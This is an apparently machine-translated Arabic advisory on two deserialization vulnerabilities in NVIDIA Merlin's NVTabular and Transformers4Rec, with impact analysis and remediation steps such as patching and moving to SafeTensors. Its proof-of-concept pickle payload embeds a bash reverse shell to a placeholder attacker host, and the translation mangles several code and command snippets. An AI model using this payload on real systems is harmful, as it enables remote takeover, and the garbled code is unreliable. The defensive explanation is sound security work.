يواجه مشهد البنية التحتية للذكاء الاصطناعي تحديًا أمنيًا شديدًا. إنفيديا ميرلينوهو إطار العمل القياسي في الصناعة لبناء أنظمة توصية عالية الأداء على نطاق واسع، وجد أنه يحتوي على عنصرين أساسيين تنفيذ التعليمات البرمجية عن بُعد (RCE) نقاط الضعف.
تم تتبعها على النحو التالي CVE-2025-33214 و CVE-2025-33213، فإن هذه العيوب تكمن في جدول NVTabular و ترانسفورمرز فور ريك المكتبات. وهي تنبع من ضعف أساسي في معالجة بيانات بايثون: إلغاء التحويل غير الآمن (CWE-502).
يمكن للمهاجمين استغلال هذه الثغرات لاختراق مجموعات وحدات معالجة الرسومات، أو تسميم نماذج الذكاء الاصطناعي، أو تسريب مجموعات البيانات الخاصة ببساطة عن طريق حث النظام على تحميل ملف تهيئة خبيث أو نقطة تفتيش نموذجية خبيثة. تقدم هذه المقالة تشريحًا تقنيًا لآلية الاستغلال، وتأثيرها على خطوط أنابيب MLOPS، واستراتيجية التصحيح الإلزامية.
مصفوفة الثغرات الأمنية: ما الذي يتأثر؟
تؤثر الثغرات على الطريقة التي تتعامل بها مكونات Merlin مع تسلسل البيانات - وتحديدًا استخدام مخلل الوحدة النمطية عند تحميل القطع الأثرية من القرص.
| المكوّن | معرّف CVE | نوع الضعف | الخطورة | الوظائف المتأثرة |
|---|---|---|---|---|
| جدول NVTabular | CVE-2025-33214 | إلغاء التسلسل غير الآمن | الحرجة | تحميل كائنات سير العمل المحفوظة عبر سير العمل.تحميل() |
| ترانسفورمرز فور ريك | CVE-2025-33213 | إلغاء التسلسل غير الآمن | الحرجة | تحميل نقاط التحقق من النموذج وتكوينات التدريب |
كلتا الثغرتين تحتويان على درجة CVSS تحوم بالقرب من 9.8، مما يشير إلى أنها قابلة للاستغلال عن بُعد (إذا كان مصدر الملف بعيدًا) أو محليًا، ولا تتطلب مصادقة، وتؤدي إلى اختراق النظام بالكامل.
التشريح التقني عندما يصبح التخليل سماً
لفهم لماذا هذه CVEs خطيرة للغاية، يجب علينا تحليل الآلية الأساسية للهجوم: بايثون مخلل تنسيق التسلسل.
مشكلة "المخلل"
على عكس JSON أو CSV، وهي تنسيقات بيانات فقط, مخلل هو محرك آلة افتراضية قائمة على المكدس. لا يخزن البيانات فقط؛ بل يخزن تعليمات حول كيفية إعادة بناء كائنات Python.
تكمن نقطة الضعف في __تخفيض_ طريقة. عندما تفك بايثون كائنًا ما، إذا كان هذا الكائن يُعرّف __تخفيض_فإن بايثون ستنفذ قابلية الاستدعاء التي أرجعها ذلك الأسلوب. تسمح هذه الميزة، المصممة لإعادة بناء الكائنات المشروعة، للمهاجمين بتضمين تعليمات برمجية عشوائية.
تحليل شيفرة الاستغلال (تحليل الشيفرة البرمجية المفاهيمية)
⚠️ إخلاء المسؤولية: الرمز التالي هو لأغراض الاختبار التعليمي والدفاعي فقط.
في سياق جدول NVTabular، يمكن للمهاجم أن يصمم برنامجًا خبيثًا سير العمل الدليل. عندما يقوم عالم البيانات أو خط أنابيب MLOps الآلي بتحميل سير العمل هذا لتنفيذ عمليات ETL، يتم تشغيل الحمولة.
هذا ما يبدو عليه مولد الحمولة المسلحة:
بايثون
'استيراد المخلل استيراد نظام التشغيل
صنف الأداة الخبيثة(كائن): تعريف تقليل(ذاتي): # الحمولة: يتم تشغيل هذا الأمر فور إلغاء التسلسل. # في هجوم حقيقي، قد يكون هذا الأمر قذيفة عكسية أو منارة C2. cmd = "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444/44> 0>&1′" إرجاع (os.system, (cmd,))
توليد السم
هذا يحاكي ملف النموذج أو تكوين سير العمل المخترق
exploit_data = pickle.dumps(MaliciousArtifact())
الزناد
داخل NVTabular أو Transformers4Rec، يتم تشغيل كود مشابه لهذا:
لا يتم إجراء أي تحقق من محتويات الملف قبل التنفيذ.
pickle.loads.loads(exploit_data)``
المتحولون4Rec Vector
بالنسبة لـ ترانسفورمرز فور ريك (CVE-2025-33213)، غالبًا ما يكون الخطر مخفيًا داخل ملفات نماذج PyTorch (.pt أو .بن). نظرًا لأن آليات حفظ PyTorch القياسية تستخدم مخلل افتراضيًا، يمكن لأي نموذج مُدرَّب مسبقًا تم تنزيله من مصدر غير موثوق به (على سبيل المثال، مستودع Hugging Face المخترق) أن يكون بمثابة حصان طروادة.
تحليل الأثر: تكلفة التسوية
لماذا يجب أن يهتم مدراء أمن المعلومات والمدراء الهندسيين؟ لأن خطوط أنابيب Merlin تعمل على بنية تحتية عالية القيمة.
A. اختطاف مجموعة وحدات معالجة الرسومات (Cryptojacking)
تم تصميم Merlin لوحدات معالجة الرسومات NVIDIA A100/H100. هذه هي أكثر الموارد المرغوبة لتعدين العملات الرقمية. يسمح برنامج RCE للمهاجمين بتثبيت أدوات التعدين بصمت، مما يكلف الشركات آلاف الدولارات من رسوم الحوسبة السحابية يومياً.
B. التسمم في سلسلة التوريد
إذا قام أحد المهاجمين باختراق خط أنابيب التدريب عبر NVTabular (مرحلة ETL)، فيمكنه تغيير بيانات الإدخال بمهارة.
- النتيجة: يتعلم النموذج التحيزات الخفية أو الأبواب الخلفية (على سبيل المثال، "التوصية دائمًا بهذا المنتج المحدد" أو "تجاهل علامات الاحتيال لمعرف المستخدم هذا").
C. الحركة الجانبية
غالبًا ما تتمتع مجموعات التدريب على الذكاء الاصطناعي بامتياز الوصول إلى بحيرات البيانات (S3 وSnowflake) ومستودعات التعليمات البرمجية الداخلية. تُعد العقدة المخترقة بمثابة رأس شاطئ مثالي للدخول بشكل أعمق في شبكة الشركة.
استراتيجية الإصلاح: تأمين خط أنابيب الذكاء الاصطناعي
لقد أصدرت NVIDIA تصحيحات، ولكن الإصلاح الحقيقي يتطلب تحولاً في كيفية تعامل مؤسستك مع القطع الأثرية للذكاء الاصطناعي.
المرحلة 1: الترقيع الفوري (مرحلة "إيقاف النزيف")
تحقق من إصداراتك الحالية وقم بالترقية فوراً باستخدام نقطة أو كوندا.
باش
'# قم بتحديث NVTabular إلى الإصدار المصحح pip install -upgrade nvtabular
تحديث Transformers4Rec إلى النسخة المصححة
تثبيت نقطة -تثبيت -ترقية محولات 4rec``
التحقق:
بعد التثبيت، تحقق من أرقام الإصدار مقابل نشرة أمان NVIDIA للتأكد من أنك تستخدم إصدارًا بتاريخ ديسمبر 2025 أو أحدث.
المرحلة 2: التقوية المعمارية (مرحلة "انعدام الثقة")
1. الترحيل إلى SafeTensors
الصناعة تبتعد عن المخلل. المضاعفات الآمنة هو تنسيق تسلسلي جديد تم تطويره بواسطة Hugging Face وهو آمن حسب التصميم. يخزن الموترين كبيانات بحتة، مما يجعل تنفيذ التعليمات البرمجية مستحيلًا أثناء التحميل.
مثال على ترحيل الرمز:
بايثون
`# ❌ VULNERABLE (PyTorch/Pickle PyTorch/Pickle) torch.save(model.state_dict(), "موديل.pt")) model.load_state_dict(torch.load("موديل.pt“))
الأمان (SafeTensors)
من safetensors.torch استيراد حفظ_ملف، تحميل_ملف
احفظ_ملف(model.state_dict()، "model.safetensors") تحميل_ملف(model، "model.safetensors")
2. تنفيذ نموذج المسح الضوئي
دمج ماسح ضوئي في خط أنابيب CI/CD أو سجل النماذج. أدوات مثل بيكلزكان يمكن تحليل .pkl, .ptو .بن الملفات بحثًا عن توقيعات التعليمات البرمجية الثانوية المشبوهة قبل السماح بتحميلها.
3. تجزئة الشبكة (تصفية الخروج)
يجب ألا يكون لدى بيئات التدريب الخاصة بك وصول غير مقيد إلى الإنترنت.
- بلوك: كل حركة المرور الصادرة بشكل افتراضي.
- السماح: نطاقات محددة وموثوقة فقط (على سبيل المثال، مرايا PyPI الداخلية، ومجموعات S3 محددة).
- لماذا؟ هذا يمنع القشرة العكسية (مثل تلك الموجودة في PoC أعلاه) من الاتصال مرة أخرى بخادم القيادة والتحكم الخاص بالمهاجم.
الخاتمة
يُعد الكشف عن CVE-2025-33214 و CVE-2025-33213 بمثابة جرس إنذار لصناعة الذكاء الاصطناعي. لم يعد بإمكاننا التعامل مع ملفات النماذج وسير عمل البيانات كأصول ثابتة حميدة; فهي شفرة قابلة للتنفيذ.
نظرًا لأن الذكاء الاصطناعي يندمج بشكل أعمق في العمليات التجارية الحرجة، فإن تأمين خط أنابيب عمليات التشغيل الآلي لا يقل أهمية عن تأمين تطبيق الويب نفسه.
خطة عمل اليوم:
- مراجعة الحسابات: تشغيل
قائمة النقاطعلى جميع حاويات التدريب. - التصحيح: نشر أحدث إصدارات NVIDIA Merlin.
- إعادة التصحيح: ابدأ خارطة الطريق لاستبدال Pickle بـ SafeTensors.
